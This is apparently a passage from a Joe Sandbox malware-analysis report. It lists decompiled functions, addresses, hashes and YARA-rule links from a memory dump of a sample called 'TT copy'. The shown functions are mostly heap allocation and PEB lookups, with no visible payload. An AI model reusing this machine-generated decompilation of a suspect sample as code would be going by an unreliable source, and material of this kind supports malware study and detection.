					_t20 = L01084620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                                                                            0x0106f35d
                                                                                                            0x0106f361
                                                                                                            0x0106f367
                                                                                                            0x0106f372
                                                                                                            0x0106f38c
                                                                                                            0x0106f38c
                                                                                                            0x0106f394

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                            • Instruction ID: 04d0777587319ca8aae6356e9bf57466e5a8d65e82747ad2ee227c039eb95815
                                                                                                            • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                            • Instruction Fuzzy Hash: 47E02032A40229FBDB31A6DD9D15F9BBFFCDB58AA0F008195FA44D7150D5759D00D2D0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0107FF60 Relevance: .0, Instructions: 22COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0107FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x10411a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E011388F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E01080050(_t14);
				}
			}










                                                                                                            0x0107ff66
                                                                                                            0x0107ff6b
                                                                                                            0x00000000
                                                                                                            0x0107ff8f
                                                                                                            0x00000000
                                                                                                            0x0107ff8f

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d2cb423b5496e1ec6b0b58bf1ffc21d8b07f4d2c9802e917ab18f4bda6ad197d
                                                                                                            • Instruction ID: 9bc27d83db5cbf39e9ddcd5746ec0ac77250094ed6f5ebb9a94945af31d4076e
                                                                                                            • Opcode Fuzzy Hash: d2cb423b5496e1ec6b0b58bf1ffc21d8b07f4d2c9802e917ab18f4bda6ad197d
                                                                                                            • Instruction Fuzzy Hash: E4E0D8B0909206DFD735D759D040F1537DC9F51621F19409DF09887502CA61F881C68D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010F41E8 Relevance: .0, Instructions: 21COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E010F41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x11408f0);
				_t5 = E010BD08C(__ebx, __edi, __esi);
				if( *0x11587ec == 0) {
					E0107EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x11587ec == 0) {
						 *0x11587f0 = 0x11587ec;
						 *0x11587ec = 0x11587ec;
						 *0x11587e8 = 0x11587e4;
						 *0x11587e4 = 0x11587e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L010F4248();
				}
				return E010BD0D1(_t5);
			}





                                                                                                            0x010f41e8
                                                                                                            0x010f41ea
                                                                                                            0x010f41ef
                                                                                                            0x010f41fb
                                                                                                            0x010f4206
                                                                                                            0x010f420b
                                                                                                            0x010f4216
                                                                                                            0x010f421d
                                                                                                            0x010f4222
                                                                                                            0x010f422c
                                                                                                            0x010f4231
                                                                                                            0x010f4231
                                                                                                            0x010f4236
                                                                                                            0x010f423d
                                                                                                            0x010f423d
                                                                                                            0x010f4247

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c0802ca9373171e77819ebc14439dac824e1554d837b07b120305198d5b033a3
                                                                                                            • Instruction ID: 573ccf329f0ec75b9cb61ea013f2a99341e6b41b7ec0c3dcc187b107cc94d47a
                                                                                                            • Opcode Fuzzy Hash: c0802ca9373171e77819ebc14439dac824e1554d837b07b120305198d5b033a3
                                                                                                            • Instruction Fuzzy Hash: 89F01E78821B01CFDBF8EFBAD60179836A4F754324F4081BAAAA0876D9C73844A0CF01
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0111D380 Relevance: .0, Instructions: 21COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0111D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0106E8B0(__ecx, _a4, 0xfff);
					L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                                                                            0x0111d38a
                                                                                                            0x0111d39b
                                                                                                            0x0111d3b1
                                                                                                            0x00000000
                                                                                                            0x0111d3b6
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                            • Instruction ID: f976d9224d561a8f0a8fb1c8f023b889a0c06147ba7c819a278ded5ae644279b
                                                                                                            • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                            • Instruction Fuzzy Hash: 16E0C231288205BBDF266E84DC00FA9BB1AEB507A0F204031FE485A690CA759C91D6C4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0109A185 Relevance: .0, Instructions: 20COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0109A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x11567e4 >= 0xa) {
					if(_t5 < 0x1156800 || _t5 >= 0x1156900) {
						return L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E01080010(0x11567e0, _t5);
				}
			}





                                                                                                            0x0109a190
                                                                                                            0x0109a1a6
                                                                                                            0x0109a1c2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0109a192
                                                                                                            0x0109a192
                                                                                                            0x0109a19f
                                                                                                            0x0109a19f

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 019391c17bb165c45c06f79f50ec40c4b26344da9c1691a9792e8df47c2c7df3
                                                                                                            • Instruction ID: a9349dd42d8a8411f5121d8bfa391c249060b5d68ac048d7021103e316573c66
                                                                                                            • Opcode Fuzzy Hash: 019391c17bb165c45c06f79f50ec40c4b26344da9c1691a9792e8df47c2c7df3
                                                                                                            • Instruction Fuzzy Hash: D5D0C2A1221000DACB2D23109E24BA13612F780760F74840CF2960B5A8FA508CD4E188
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010916E0 Relevance: .0, Instructions: 17COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E010916E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E01091710(0x11567e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L01084620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                                                                            0x010916e8
                                                                                                            0x010916ef
                                                                                                            0x010916f3
                                                                                                            0x010916fe
                                                                                                            0x00000000
                                                                                                            0x01091700
                                                                                                            0x0109170d
                                                                                                            0x0109170d
                                                                                                            0x010916f2
                                                                                                            0x010916f2
                                                                                                            0x010916f2
                                                                                                            0x010916f2

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bae40c0842f4079646b1293785885a2f16ce8c895dbe00c3573f1fd22ee7c00c
                                                                                                            • Instruction ID: d2679a9003d9f3377ae6351236cdefe8ee1d36b5bf08fb4312e6591e9d42fbc0
                                                                                                            • Opcode Fuzzy Hash: bae40c0842f4079646b1293785885a2f16ce8c895dbe00c3573f1fd22ee7c00c
                                                                                                            • Instruction Fuzzy Hash: 04D0A731304103A6EF2D5B14AC24B143691EB947A5F38009CF247595C0DFB0CCA3F088
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010E53CA Relevance: .0, Instructions: 16COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E010E53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0107EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                                                                            0x010e53ca
                                                                                                            0x010e53ce
                                                                                                            0x010e53d9
                                                                                                            0x010e53de
                                                                                                            0x010e53e1
                                                                                                            0x010e53e1
                                                                                                            0x010e53e6
                                                                                                            0x010e53f3
                                                                                                            0x00000000
                                                                                                            0x010e53f8
                                                                                                            0x010e53fb

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                                            • Instruction ID: 2be46e13e3c191c70f2a8946bb11383ee3c75aff9d09728a63f33e475a45d88d
                                                                                                            • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                                            • Instruction Fuzzy Hash: E6E08C35A047809FCF12EB59CA54F9EBBF5FB84B00F140484A0885B620CA24AC00CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0107AAB0 Relevance: .0, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0107AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                                                                            0x0107aab6
                                                                                                            0x0107aabb
                                                                                                            0x010ca442
                                                                                                            0x00000000
                                                                                                            0x010ca448
                                                                                                            0x010ca454
                                                                                                            0x010ca454
                                                                                                            0x0107aac1
                                                                                                            0x0107aac1
                                                                                                            0x0107aac6
                                                                                                            0x0107aac6

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                            • Instruction ID: ad4ca0bcb7a4ae89912d2a3de9ed6e1e223ff49684775b1a71650dbf0fb6a33a
                                                                                                            • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                            • Instruction Fuzzy Hash: 50D0C935352980CFD657CB0CC554B0973E4BB44B40FC504D0E540CB722E72CD940CA00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010935A1 Relevance: .0, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E010935A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0107EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                                                                            0x010935a1
                                                                                                            0x010935a1
                                                                                                            0x010935a5
                                                                                                            0x010935ab
                                                                                                            0x010935ab
                                                                                                            0x010935b5
                                                                                                            0x00000000
                                                                                                            0x010935c1
                                                                                                            0x010935b7

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                            • Instruction ID: b97df5b90ce8316a5ec0cef717cf7897a7fcddc6cdc0a7f5f30a5b8cf28e9d76
                                                                                                            • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                            • Instruction Fuzzy Hash: 38D0A73140118199DF41AB34C1347ACBBB1BB04208F58109580C14D452C3354909EE00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0106DB40 Relevance: .0, Instructions: 11COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0106DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L01084620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                                                                            0x0106db4d
                                                                                                            0x0106db54
                                                                                                            0x0106db5f
                                                                                                            0x0106db56
                                                                                                            0x0106db56
                                                                                                            0x0106db5c
                                                                                                            0x0106db5c

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                            • Instruction ID: a3fc93c97cee1e92019466338946254908cda779f93e432c4810c81cb52af119
                                                                                                            • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                            • Instruction Fuzzy Hash: EAC08C30380A02EAEB222F20DD01B403AA4BB50B05F4400A06380DA0F0EBB8D811E600
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010EA537 Relevance: .0, Instructions: 11COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E010EA537(intOrPtr _a4, intOrPtr _a8) {

				return L01088E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                                                                            0x010ea553

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                            • Instruction ID: 4b182943ed567ef56e3f1e893774970dfc25026635c32f950dccb804be7d47bb
                                                                                                            • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                            • Instruction Fuzzy Hash: 41C08C37080248BBCB127F81CC00F467F2AFBA4B60F008011FA880B5B0C632E970EB84
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01083A1C Relevance: .0, Instructions: 10COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E01083A1C(intOrPtr _a4) {
				void* _t5;

				return L01084620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                                                                            0x01083a35

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                            • Instruction ID: 87f70e49f1ae9875a8b6b70cf3d510c87db5367ec17f8ea1641e53382d5dcf34
                                                                                                            • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                            • Instruction Fuzzy Hash: 46C08C32080248BBC7126E41DC00F017B29E7A4B60F000020B6440A5608672EC60D588
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0106AD30 Relevance: .0, Instructions: 10COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0106AD30(intOrPtr _a4) {

				return L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                                                                            0x0106ad49

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                            • Instruction ID: d3092a878f0a19596f2ff0034b5edafcd52924297e21502dedf40a5c039d80f1
                                                                                                            • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                            • Instruction Fuzzy Hash: 73C08C32080248BBC7127A45CD00F017B29E7A0B60F100020F6440A6618932E860D588
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010936CC Relevance: .0, Instructions: 10COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E010936CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L01084620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                                                                            0x010936d2
                                                                                                            0x010936e8
                                                                                                            0x010936d4
                                                                                                            0x010936e5
                                                                                                            0x010936e5

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                            • Instruction ID: c39504993a0d9e228f9f9d0c1713edf365089c1c5151689957bf73ca43fef83e
                                                                                                            • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                            • Instruction Fuzzy Hash: 74C02B74154440FBDB252F30CD10F147294F704A21F6403947260894F0E6689C10E500
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010776E2 Relevance: .0, Instructions: 10COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E010776E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                                                                            0x010776e4
                                                                                                            0x00000000
                                                                                                            0x010776f8
                                                                                                            0x010776fd

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                            • Instruction ID: a1578c75ebad91f836d204fcbe004d3fc5fe67d7cd44331c6b0cc6b7d7995cb7
                                                                                                            • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                            • Instruction Fuzzy Hash: 2FC08C705411805AEB2A670CCE28B203A90BB0C648F5801DCEBC1094A6C368A823C20C
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01087D50 Relevance: .0, Instructions: 7COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E01087D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                                                                            0x01087d56
                                                                                                            0x01087d5b
                                                                                                            0x01087d60
                                                                                                            0x01087d5d
                                                                                                            0x01087d5d
                                                                                                            0x01087d5d

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                            • Instruction ID: 047506447a82e250eaa45c9367d45349be0243d32edce0a4aea07f373ee4d66c
                                                                                                            • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                            • Instruction Fuzzy Hash: 2AB09235301A408FCE56EF18C080B1533F4BB44A40B9400D0E440CBA21D229E8008900
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01092ACB Relevance: .0, Instructions: 5COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E01092ACB() {
				void* _t5;

				return E0107EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                                                                            0x01092adc

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                            • Instruction ID: 34ddbf88ec92e07681752044e157eebf659b1927af552b079c22cbdf05f7c023
                                                                                                            • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                            • Instruction Fuzzy Hash: 53B01232C11441CFCF02EF40CA10B6A7731FB40750F0544D1900127930C228AC01CB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9950 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 251e9f865232a97531ae09686137f5e7968b0fe4ce4a839d23fe04bed4997920
                                                                                                            • Instruction ID: f7ce6f6a8a6eea387ed3c1408ea3d107b9feca0e4a6cf90c2f441f46eb5db939
                                                                                                            • Opcode Fuzzy Hash: 251e9f865232a97531ae09686137f5e7968b0fe4ce4a839d23fe04bed4997920
                                                                                                            • Instruction Fuzzy Hash: FC9002A120140903D180659988446474105E7D0346F51C021A2454555ECA699C517275
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A99D0 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 820bda79b6de8810b9101cb1ad5e4a8cd435086e735f03eb3ddd60d6844b83d2
                                                                                                            • Instruction ID: 4917293e3935c8025cdaf115f857aeb8b9fd9700741c7a8471659c06ecda077f
                                                                                                            • Opcode Fuzzy Hash: 820bda79b6de8810b9101cb1ad5e4a8cd435086e735f03eb3ddd60d6844b83d2
                                                                                                            • Instruction Fuzzy Hash: 159002A121100543D144619984447464145E7E1245F51C022A2544554CC5699C616265
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9820 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
